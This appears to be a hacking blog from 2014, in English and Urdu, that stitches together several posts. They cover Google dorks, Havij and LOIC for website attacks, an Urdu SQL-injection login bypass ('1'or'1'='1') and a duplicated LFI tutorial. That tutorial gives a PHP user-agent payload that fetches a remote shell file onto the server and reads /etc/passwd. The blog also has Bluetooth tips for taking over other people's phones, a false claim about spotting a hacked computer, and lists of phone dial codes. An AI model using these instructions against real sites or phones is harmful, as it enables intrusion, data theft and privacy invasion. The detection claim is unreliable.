Thursday 29 May 2014

BEWARE: List of websites making you fool in the name of Facebook Hacking

facebook hacking tool
From many days, when I was exploring Google for any latest news related to hacks, i got a point that how many websites are there when you search for ‘how to hack a Facebook account, facebook hacking, fb hack, facebook online hack & many more…’ Really I was also shocked when I searched it and found many direct websites, blogs claiming to hack any of the Facebook account LIVE.
The thing I want to say, you must beware of those sites because some of these websites are just redirecting you to complete surveys to earn money, some are installing malware on your systems to get your personal info.
So, for your safety,we collected a list of those websites which are making you fool in the name of Facebook Account Hacking, YOU MUST NOT USE ANY OF THESE WEBSITES, AND NOT FOR TESTING PURPOSE, as these sites can harm your systems:
Before you read the list, one of the link which is really dangerous and was founded on every page, on every related keywords of FB hack is from ‘Megaupload.org,’ which is basically coming up upon clicking various malicious URLs, you can find out that link below from the list.
One of the report was published just few days ago, in which hackers using a post named ‘How you can hack your friends’ facebook account,’ and in the name of that your Facebook account hijacked to like and follow other pages automatically without your own authentication.
We collected websites above from various sources, if you have any website which is not in the list above, so send us now HERE.

Wednesday 28 May 2014

Nowadays it’s easy to hack a website in just four steps

cartoon of hacking a website
Till yesteryears it required Tech Geeks to have an above average knowledge to hack a website but these days it has become a child’s play. Like conventional searches, you can Google out the tools required to plan a Hack-Attack on a website and with a little effort you can execute the same with ease. Here it is, in 4 easy steps, how hackers execute it.
Step 1: Identifying
The Hacktivists first identify their target website which they want to attack upon. They first qualify the website, according to the vulnerability level, they wish to attack. Checking the vulnerability of the website allows the hacker to prepare tools and techniques required to bring down the website.
Hackers generally use Google Dork, or Google Hacking, to execute a vulnerability check against these easy-to-hack websites. It was very recent that a hacker posted a list of 5,000 such websites which were really easy to be attacked. If they don’t wish to Google it out, they can Bing it. This tool is heaven for hackers as it helps in qualifying such websites.
Hackers have a ready-to-refer index of Dorks which points out the websites having a particular vulnerability. Right from passwords to Login credentials, there is Dork available for everything. They would Google “intitle:”Index of” master.passwd” which will return them a file containing the passwords and then they have the list of potential victims ready with them to execute the hack. 
Step 2: Spotting the vulnerabilities
Acunetix – a Windows based application to test the website – developed by a UK based company, was designed and is still in prominent use by developers to test the vulnerabilities in the website, but the technical expertise of hackers to this tool allows them access to point out the weakness levels of the website. Once the site is identified for attack, this tool is used by hackers to check the vulnerability of the website, as all websites qualified in level 1 may not be susceptible to attack.
Since the hackers have in-depth knowledge of the above mentioned software, they can not only crack the version from a trial one, but the cracked version is also available freely amongst the hacker community. Once they enter the URL or website address in this software they are able to point out the loopholes in the website and all they do is, move to step 3.
Step 3: The Attack on the website – SQL Injection
The SQL injection is the easiest and the most used way by hackers to hack into a website. It is used by hackers to hack into user accounts and steal information stored into its databases. This attack aims at information stealing using some lines of code of SQL (Structured Query List) which is a database programming language. The hacker’s don’t even have to learn the language for this attack, as there is an available software called “Havij” in the hacker forums where it is available free of cost. It comes as an easily useable application. Havij is originally a development from Iran. The word itself means carrot, a bad-slang for the word penis, ultimately meaning that the hack-ware helps penetrating a website.
Havij has 2 versions – paid and unpaid, both of them differential in powers of penetrating, although the paid version can be cracked and downloaded from other hacker forums. The interface of this software completely simple like any other windows application, which does its work when a newbie hacker just copies the link of the website needed to hack and pastes it into the application.
The tasks Havij can perform are very surprising. The best one for them and worst for the users of the website is called “Get”. It fetches all the data stored in the target website’s databases which range from usernames, passwords to phone numbers and bank details.
It is so easy for hackers that within a couple of minutes of their time, in which they can search, download, and use one or two automated hack-wares that allows them to access websites which are vulnerable to such attacks. Very much assured, that the websites of high profile companies like Google, Microsoft and Facebook are completely safe from such tools. As mentioned before, the vulnerability of the web is displayed by the attack made on Sony’s PlayStation Network which led to the leaking of their customers’ personal information in a very similar way.
Step 4: The DDoS – The A Game
SQL Injection has been used by the infamous hacktivist community – Anonymous for over a year now, but they tend to go forth with the DDoS when simple tools like the Havij don’t work. Again like the SQL (pronounced Sequel) Injection attack there are freely available tools for the DDoS as well.
As it appears, the DDoS is also as simple as the SQL Injection attack. The program used here is called the Low Orbit Ion Cannon (LOIC), which was brought to life by web developers for stress testing their own websites, but was later hijacked by hackers to attack the websites for non-social use.
The LOIC is available to the hackers freely on the website Source Forge. Again as simple as the Havij, the hackers just have to type in the link of the website they want to DDoS and the application does the rest. LOIC overloads the server of the target website with upto 200 requests per second.
Now again, the bigger websites can easily cope up with this type of an attack without crashing, most of the other websites cannot. Surely if a group of hackers, although newborn, dedicates itself to the job, it is very easy for them to complete it.
This type of technology horrifies the readers, but it is very simple to use by the hackers that they can even control it from their phones, meaning that they could well be watching a movie with their buddies in the cinema while attacking the website they want to bring down.
This is not an exhaustive list and processes how the hackers execute the act but there are many a tutorials on various hacking forums that teach how to perform the attack. There is no end to this notoriousness, in many cases a heinous crime, which has caused a loss of millions and millions of dollars to the world. So are you going to get your website checked through your developer today? May be today would be a real good day to get it done.

Thursday 22 May 2014

Hack Website SQL Injection Tutorial in Urdu


STEP 1: Sub Se Pehle Apko Ek Site Chahye Jis Ko Ap Ne Hack Karna Hain Is Dork List Ko Download Keren Here Aur Koi Bhi Dork Copy Kar Kay Google Mein Paste Kar Dain,Us Kay Bad Kafi Sites Show Hon Gi Aap Check Karte Jaye Konsi SQL Valn Hein
For example: Mere Pass Ye Site Hain www.Abc.org.in So Ab Hamare Pass Site Hain Jis Ko Hum Ne Hack Karna Hain,
Ab 2 Problems Hain Kay Number 1 Admin Login Find Karna and Number 2 Admin Login Hack Karna,
Solution Of Problem No.1 Admin Find Karna:
STEP 1: Is Tool Ko Download Kar Le Click Here To Download
Is Ko Extract Karen Apni Hard Disk Mein Aur Install Keren Havij Tool Aur RUN Keren
Open Havij Or Click Keren Find Admin Par Or Nichey Box Mein Apni Site Ka Link Enter Keren and Click On Start Or Ye Apko Show kar De Ga www.Abc.org.in
So Hamari Pehli Problem Ka Solution Mil Gaya Kay Admin Kese Find Karna Hain Ab Problem Number 2 Kay Admin Panel Hack Kese Karna Hain
2 Ways Hein Admin Login Hack Karne Kay SQL Mathod Mein Ek Havij Hein Aur 2nd SQL Querioes
SQL Quesries List Download Keren Click Here
Apne Net Browser Mein Jaye Aur Admin Login Open Keren User Name Ki Jaga Admin Type Keren Password Ki Jaga Bhi Admin Type Keren Agar Access Na Howa Tu Password Ki Jaga 1'or'1'='1 Ye Type Keren
So User : admin
Password : 1'or'1'='1
Aur Login Success
Thats it Dosto Apni Har Site Kay Admin Login Mein Ye Enter Kar Kay Check Kar Len...!
Enjoy..!

The Hacking Short course ebook in Urdu (Mediafire link)

The Hacking Short course ebook in Urdu (Mediafire link)


Hacking means to break the security  of any admin panel,no matter it is an website admin panel, an Email id admin panel, or a Personal Computer. to hack a website we use some methods which are called as exploits, so using these exploits a person can get access at any website's admin panel. here i am gonna post a urdu pdf hacking short course book from where you can get a complete over view about hacking but remember i just gonna share it to increase knowledge so every person will be liable for his own act


Mediafire Link
Download Urdu Hacking short course book

How To Know If YouR coMputer Is Hacked

1- Go To Your Windows Task Manager ( Ctrl+alt+Del )

2- then Go To ''Process''

3-If You Found ''IEXPLORE'' Written in Bold Like It Shown In The Pic That Mean Your Computer Is Hacked.

Photo: How To Know If YouR coMputer Is Hacked {{Share It ;) }}
************************************************

1- Go To Your Windows Task Manager ( Ctrl+alt+Del )

2- then Go To ''Process''

3-If You Found ''IEXPLORE'' Written in Bold Like It Shown In The Pic That Mean Your Computer Is Hacked.




#4in

Shell Via LFI And /Proc/Self/Environ

Basicly LFI stands for Local File Inclusion. This attack can allow the attacker to gain access to the server by upload a shell to the website.

I. This attack needs 3 main things to get it done:
> Shell --> You can find shells here:
http://www.r57.gen.tr/
> User Agent Switcher Addon -->
For Chrome:
https://chrome.google.com/webstore/detail/user-agent-switcher-for-c/djflhoibgkdhkhhcedjiklpkjnoahfmg
or FireFox:
https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher
> Hosted Website that allows PHP -->
000WebHost:
http://www.000webhost.com/
Zymic:
http://www.zymic.com/
110MB:
http://www.110mb.com/

II. Here are some google dorks to find the vulnerability:
inurl:index.php?id=
inurl:index.php?cat=
inurl:index.php?action=
inurl:index.php?content=
inurl:index.php?page=

III. Now we have to create a new USER AGENT and put in User Agent field the following code:
<?php phpinfo(); ?>

IV. Description field is the name of the user agent so put what ever you want like showed in the picture 1.
Remove other fields and create another user agent and in User Agent field put this code:
<?php $file = fopen("urshellname.php","w+"); $stream = fopen ("http://ursitename.com/urshellname.txt", "r"); while(!feof($stream)) { $shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>

It should look like showed in the picture 2.

V. Remmember to change the path in the code to your site and when you upload your shell it must be in .txt not .php format so that the code can read & excute it.
To check if website is vulnerable write ../ in after the paremeter like this:
http://www.site.com/index.php?id=..%2F

VI. If you got [function.include] then the website may be vulnerable. So after getting the error remove ../ and replace with it /etc/passwd like:
http://www.site.com/index.php?id=%2Fetc%2Fpasswd

VII. If you got another [function.include] then add ../ until you got many text ( http headers ) then the site is vulnerable so after you find the passwd file we have to replace /etc/passwd it to be:
/proc/self/environ

so the url will be something like this:
http://www.site.com/index.php?id=%2Fproc%2Fself%2Fenviron

VIII. Change your user agent to the first created user agent that contain <?php phpinfo(); ?> and reload the page, if you got a text similar to PHP VERSION then the site has excuted the code.

Uploading the shell is the easy same as the above one we have to change our user agent to the second one we created and remmember to fix the paths in your user agent and reload the page.

IX. To access your shell go to:
http://www.site.com/index.php?id=urshellname.php

If that didn't work then try this:
http://www.site.com/urshellname.php

X. Now you have access to the server and it seems that you uploaded your shell successfully

Hit like if you have found it useful!



Photo: Shell Via LFI And /Proc/Self/Environ

Basicly LFI stands for Local File Inclusion. This attack can allow the attacker to gain access to the server by upload a shell to the website.

I. This attack needs 3 main things to get it done:
> Shell --> You can find shells here:
http://www.r57.gen.tr/
> User Agent Switcher Addon -->
For Chrome:
https://chrome.google.com/webstore/detail/user-agent-switcher-for-c/djflhoibgkdhkhhcedjiklpkjnoahfmg
or FireFox:
https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher
> Hosted Website that allows PHP -->
000WebHost:
http://www.000webhost.com/
Zymic:
http://www.zymic.com/
110MB:
http://www.110mb.com/

II. Here are some google dorks to find the vulnerability:
inurl:index.php?id=
inurl:index.php?cat=
inurl:index.php?action=
inurl:index.php?content=
inurl:index.php?page=

III. Now we have to create a new USER AGENT and put in User Agent field the following code:
<?php phpinfo(); ?>

IV. Description field is the name of the user agent so put what ever you want like showed in the picture 1.
Remove other fields and create another user agent and in User Agent field put this code:
<?php $file = fopen("urshellname.php","w+"); $stream = fopen ("http://ursitename.com/urshellname.txt", "r"); while(!feof($stream)) { $shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>

It should look like showed in the picture 2.

V. Remmember to change the path in the code to your site and when you upload your shell it must be in .txt not .php format so that the code can read & excute it.
To check if website is vulnerable write ../ in after the paremeter like this:
http://www.site.com/index.php?id=..%2F

VI. If you got [function.include] then the website may be vulnerable. So after getting the error remove ../ and replace with it /etc/passwd like:
http://www.site.com/index.php?id=%2Fetc%2Fpasswd

VII. If you got another [function.include] then add ../ until you got many text ( http headers ) then the site is vulnerable so after you find the passwd file we have to replace /etc/passwd it to be:
/proc/self/environ

so the url will be something like this:
http://www.site.com/index.php?id=%2Fproc%2Fself%2Fenviron

VIII. Change your user agent to the first created user agent that contain <?php phpinfo(); ?> and reload the page, if you got a text similar to PHP VERSION then the site has excuted the code.

Uploading the shell is the easy same as the above one we have to change our user agent to the second one we created and remmember to fix the paths in your user agent and reload the page.

IX. To access your shell go to:
http://www.site.com/index.php?id=urshellname.php

If that didn't work then try this:
http://www.site.com/urshellname.php

X. Now you have access to the server and it seems that you uploaded your shell successfully

Hit like if you have found it useful!

Hacking Secretes Lakin Sirf Information kay Liye By hus




Learn All Mobiles Hacking Tips Tricks Cheats Step by Step




Here is a list of what you can do when you have hacked the other phone. Have Fun!

  •     Read Messages. (They are no more personal!)
  •     Read Contacts. (Check your lover’s phone book to see what name he/she has saved your name. Hey, please don’t suicide when you see he/she has saved your number as lover no. 9! HeHe)
  •     Change Profile (Change the other’s profile to silent mode when you are on a date!)
  •     Play Ring tone even if the phone is silent (Annoy your classmates!)
  •     Play songs from the hacked phone in the same phone.
  •     Restart the phone (Show some magic to your friends!)
  •     Switch off the phone (Ultimate thing that you can do!)
  •     Restore Factory Settings (Do this to the most organized one and run away quickly!)
  •     Change Ringing Volume (You have enough experience how to use it. Don’t you?)




Follow these steps to hack any Blue tooth enabled mobile phone.

    Download Super Blue tooth Hack 1.8 and also check that your mobile is in the list of supported handsets from the link provided. After you have downloaded the .jar file, install it in your mobile.
    There is no need to install the software in the mobile which you want to hack.
    Turn on the Blue tooth of your handset and open the Super Blue tooth Hack Application.
    Select the connect option and then Enquiry Devices to search for any of mobile that has its Blue tooth turned on nearby.
    Your friend’s Blue tooth must also be turned on to be found. Pairing between the devices is also necessary sometimes.
    Once your friend’s phone has been found, try out its functions!
   
   
  •  Nokia Mobile (Symbian / Android) press (*#9990#) , Now your Blue tooth will always active until your mobile can't restart .

How to disable a STOLEN mobile phone?

To check your Mobile phone's serial number, key in the following digits on your phone:
*#06#
A 15 digit code will appear on the screen.
This number is unique to your
... handset. Write it down and keep it somewhere safe. when your phone get stolen, you can phone your service provider
and give them this code.
They will then be able to block your handset so even if the thief changes the SIM card, your phone will be totally useless.
You probably won't get your phone back,
but at least you know that
whoever stole it can't use/sell it either. If everybody does this, there would be no point in people stealing mobile phone..........


Android Secret Dial Codes List

All the codes are listed below. To use, simply go to your phone app and dial these codes.

  • *#*#4636#*#* – Phone Information (allowsyou to change the SMSservice centrenumber and more)
  • *2767*3855# – Factory Reset Phone
  • *#*#34971539#*#* – Shows completes information about the camera
  • *#*#7594#*#* – Changing the power button behavior – Enables direct power off once the code enabled
  • *#*#273283*255*663282*#*#* – For a quick backup to all your media files
  • *#*#197328640#*#* – Enabling test mode for service activity
  • *#*#232339#*#* or *#*#526#*#* or *#*#528#*#* – Wireless LAN Tests
  • *#*#232338#*#* – Displays Wi-Fi Mac- address
  • *#*#1472365#*#* – For a quick GPS test
  • *#*#1575#*#* – A Different type GPS test
  • *#*#0283#*#* – Packet Loopback test
  • *#*#0*#*#* – LCD display test
  • *#*#0673#*#* or *#*#0289#*#* – Audio test
  • *#*#0842#*#* – Vibration and Backlight test
    • *#*#2663#*#* – Displays touch-screen version
    • *#*#2664#*#* – Touch-Screen test
    • *#*#0588#*#* – Proximity sensor test
    • *#*#3264#*#* – Ram version
    • *#*#232331#*#* – Bluetooth test
    • *#*#7262626#*#* – Field test
    • *#*#232337#*#* – Displays bluetooth device address
    • *#*#8255#*#* – For Google Talk service monitoring
    • *#*#4986*2650468#*#* – PDA, Phone, Hardware, RF Call Date firmware info
    • *#*#1234#*#* – PDA and Phone firmware info
    • *#*#1111#*#* – FTA Software version
    • *#*#2222#*#* – FTA Hardware verion
    • *#*#44336#*#* – Displays Build time and change list number
    • *#06# – Displays IMEI number
    • *#*#8351#*#* – Enables voice dialing logging mode
    • *#*#8350#*#* – Disables voice dialing logging mode
    • **05***# – Execute from Emergency dial screen to unlock PUK code

Secret Code For Nokia


Codes :
  • *#06# For checking IMEI(international Mobile Equipment Identity)
  •  *#7780# Reset to factory settings
  • *#0000# To view software version
  • *#2820# Bluetooth device address
  • *#746025625# Sim clock allowed status
  • #pw+1234567890+1# Shows if ur sim as any restrictions
  • *3370# This Nokia code activates Enhanced Full Rate Codec (EFR) - Your Nokia cell phone uses the best sound quality but talk time is reduced my approx. 5%   
  • #3370# Deactivate Enhanced Full Rate Codec (EFR) .   
  • *#4720# Activate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time.   
  • *#4720# With this Nokia code you can deactivate the Half Rate Codec.    
  • *#0000# Displays your phones software version, 1st Line : Software Version, 2nd Line : Software Release   
  • *#9999# Phones software version if *#0000# does not work.   
  • *#06# For checking the International Mobile Equipment Identity (IMEI Number) .
  •     #pw+1234567890+1# Provider Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).
  •     #pw+1234567890+2# Network Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols) .
  •     #pw+1234567890+3# Country Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).
  •     #pw+1234567890+4# SIM Card Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols) .
  •     *#147# This lets you know who called you last (Only vodofone).
  •     *#1471# Last call (Only vodofone) .
  •     *#21# This phone code allows you to check the number that "All Calls" are diverted to.
  •     *#2640# Displays phone security code in use .
  •     *#30# Lets you see the private number.
  •     *#43# Allows you to check the "Call Waiting" status of your cell phone.
  •     *#61# Allows you to check the number that "On No Reply" calls are diverted to .
  •     *#62# Allows you to check the number that "Divert If Unreachable (no service)" calls are diverted to .
  •     *#67# Allows you to check the number that "On Busy Calls" are diverted to
  •     *#67705646# Phone code that removes operator logo on 3310 & 3330
  •     *#73# Reset phone timers and game scores.
  •     *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature "SIM 
  •  
Clock Stop Allowed", it means you will get the best standby time possible .
  •     *#7760# Manufactures code.
  •     *#7780# Restore factory settings.
  •     *#8110# Software version for the nokia 8110.
  •     *#92702689# Displays - 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair (0000 for no repairs), 5.Transfer User Data. To exit this mode you need to switch your phone off then on again.
  •     *#94870345123456789# Deactivate the PWM-Mem.
  •     **21*number# Turn on "All Calls" diverting to the phone number entered.
  •     **61*number# Turn on "No Reply" diverting to the phone number entered .
  •     **67*number# Turn on "On Busy" diverting to the phone number entered .
  •     12345 This is the default security code .
    press and hold # Lets you switch between lines.